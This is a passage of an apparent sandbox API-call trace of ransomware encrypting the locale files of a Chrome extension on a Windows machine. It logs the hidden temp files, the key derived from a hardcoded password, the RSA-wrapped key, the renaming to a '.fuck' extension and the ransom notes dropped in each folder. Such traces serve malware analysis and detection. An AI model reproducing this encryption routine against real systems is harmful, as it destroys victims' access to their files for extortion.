Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.609] GetFileType (hFile=0x5d54) returned 0x1 [0250.609] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.610] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.610] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985960 [0250.611] FindNextFileA (in: hFindFile=0x2985960, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.611] FindNextFileA (in: hFindFile=0x2985960, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.611] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.612] GetLastError () returned 0x0 [0250.612] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json")) returned 0x20 [0250.612] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json", dwFileAttributes=0x80) returned 1 [0250.612] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.613] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.614] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.614] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2988390) returned 1 [0250.617] CryptCreateHash (in: hProv=0x2988390, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.617] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.617] CryptHashData (hHash=0x2985d20, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.617] CryptDeriveKey (in: hProv=0x2988390, Algid=0x6610, hBaseData=0x2985d20, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985d60) returned 1 [0250.617] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.617] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.618] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2988968) returned 1 [0250.618] CryptImportPublicKeyInfo (in: hCryptProv=0x2988968, dwCertEncodingType=0x1, pInfo=0x2933cb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2933ce0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2933ce8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985820) returned 1 [0250.618] CryptEncrypt (in: hKey=0x2985820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.618] CryptEncrypt (in: hKey=0x2985820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2988eb8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2988eb8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.618] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2988eb8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2988eb8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.619] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xda, lpOverlapped=0x0) returned 1 [0250.621] CryptEncrypt (in: hKey=0x2985d60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xda, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0250.621] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0250.621] CloseHandle (hObject=0x5d58) returned 1 [0250.621] CloseHandle (hObject=0x5d5c) returned 1 [0250.621] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json"), bFailIfExists=0) returned 1 [0250.625] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json", dwFileAttributes=0x0) returned 1 [0250.626] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.gsg")) returned 1 [0250.627] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.fuck")) returned 1 [0250.632] CryptDestroyHash (hHash=0x2985d20) returned 1 [0250.632] CryptDestroyKey (hKey=0x2985d60) returned 1 [0250.632] CryptReleaseContext (hProv=0x2988390, dwFlags=0x0) returned 1 [0250.632] FindNextFileA (in: hFindFile=0x2985960, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.632] FindClose (in: hFindFile=0x2985960 | out: hFindFile=0x2985960) returned 1 [0250.632] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\readme_back_files.htm")) returned 0xffffffff [0250.632] AreFileApisANSI () returned 1 [0250.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e33b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.633] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.633] GetFileType (hFile=0x5d54) returned 0x1 [0250.633] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.635] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.635] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985d20 [0250.635] FindNextFileA (in: hFindFile=0x2985d20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.635] FindNextFileA (in: hFindFile=0x2985d20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.635] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.635] GetLastError () returned 0x0 [0250.636] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json")) returned 0x20 [0250.636] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json", dwFileAttributes=0x80) returned 1 [0250.637] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.637] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.639] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.639] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x29890d8) returned 1 [0250.642] CryptCreateHash (in: hProv=0x29890d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.642] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.642] CryptHashData (hHash=0x2985ba0, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.642] CryptDeriveKey (in: hProv=0x29890d8, Algid=0x6610, hBaseData=0x2985ba0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985ea0) returned 1 [0250.642] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.642] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.642] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29885b0) returned 1 [0250.643] CryptImportPublicKeyInfo (in: hCryptProv=0x29885b0, dwCertEncodingType=0x1, pInfo=0x2933d80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2933db0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2933db8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29858e0) returned 1 [0250.643] CryptEncrypt (in: hKey=0x29858e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.643] CryptEncrypt (in: hKey=0x29858e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2988a78*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2988a78*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.643] WriteFile (in: hFile=0x5d58, lpBuffer=0x2988a78*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2988a78*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.644] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x101, lpOverlapped=0x0) returned 1 [0250.646] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x101, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0250.646] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0250.646] CloseHandle (hObject=0x5d5c) returned 1 [0250.646] CloseHandle (hObject=0x5d58) returned 1 [0250.646] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json"), bFailIfExists=0) returned 1 [0250.650] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json", dwFileAttributes=0x0) returned 1 [0250.650] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.gsg")) returned 1 [0250.652] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.fuck")) returned 1 [0250.653] CryptDestroyHash (hHash=0x2985ba0) returned 1 [0250.653] CryptDestroyKey (hKey=0x2985ea0) returned 1 [0250.653] CryptReleaseContext (hProv=0x29890d8, dwFlags=0x0) returned 1 [0250.653] FindNextFileA (in: hFindFile=0x2985d20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.653] FindClose (in: hFindFile=0x2985d20 | out: hFindFile=0x2985d20) returned 1 [0250.653] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\readme_back_files.htm")) returned 0xffffffff [0250.653] AreFileApisANSI () returned 1 [0250.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4618, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.653] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.654] GetFileType (hFile=0x5d54) returned 0x1 [0250.654] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.655] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.655] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29859e0 [0250.656] FindNextFileA (in: hFindFile=0x29859e0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.656] FindNextFileA (in: hFindFile=0x29859e0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.656] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.656] GetLastError () returned 0x0 [0250.656] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json")) returned 0x20 [0250.657] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x80) returned 1 [0250.657] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.658] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.658] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.659] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x29890d8) returned 1 [0250.661] CryptCreateHash (in: hProv=0x29890d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.661] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.661] CryptHashData (hHash=0x2985ba0, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 